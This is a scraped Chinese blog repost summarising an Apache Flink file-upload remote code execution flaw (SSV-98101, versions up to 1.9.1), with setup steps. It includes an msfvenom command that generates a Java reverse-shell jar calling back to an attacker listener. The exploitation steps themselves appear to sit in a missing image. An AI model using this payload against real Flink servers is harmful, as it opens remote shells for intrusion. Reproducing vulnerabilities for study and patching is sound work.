应用安全 - Web框架 - Apache Flink - 漏洞汇总

Posted atesetenginner

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了应用安全 - Web框架 - Apache Flink - 漏洞汇总相关的知识,希望对你有一定的参考价值。

SSV ID:SSV-98101

Date: 2019-11-14

类型: 文件上传导致远程代码执行

影响版本: <= 1.9.1

 

flink下载:

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

flink安装 - 默认端口:8081

./start-cluster.sh

Shell生成:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.217.1 LPORT=6666 -f jar >shell.jar

 技术图片

以上是关于应用安全 - Web框架 - Apache Flink - 漏洞汇总的主要内容,如果未能解决你的问题,请参考以下文章

Apache Struts2 再爆严重安全漏洞

Apache Shiro权限框架理论介绍

高危安全通知Apache Struts远程代码执行漏洞

Apache Shiro 的Web应用支持指南

一颗赛艇——Apache Shiro框架简单总结

shiro的 认证 与 授权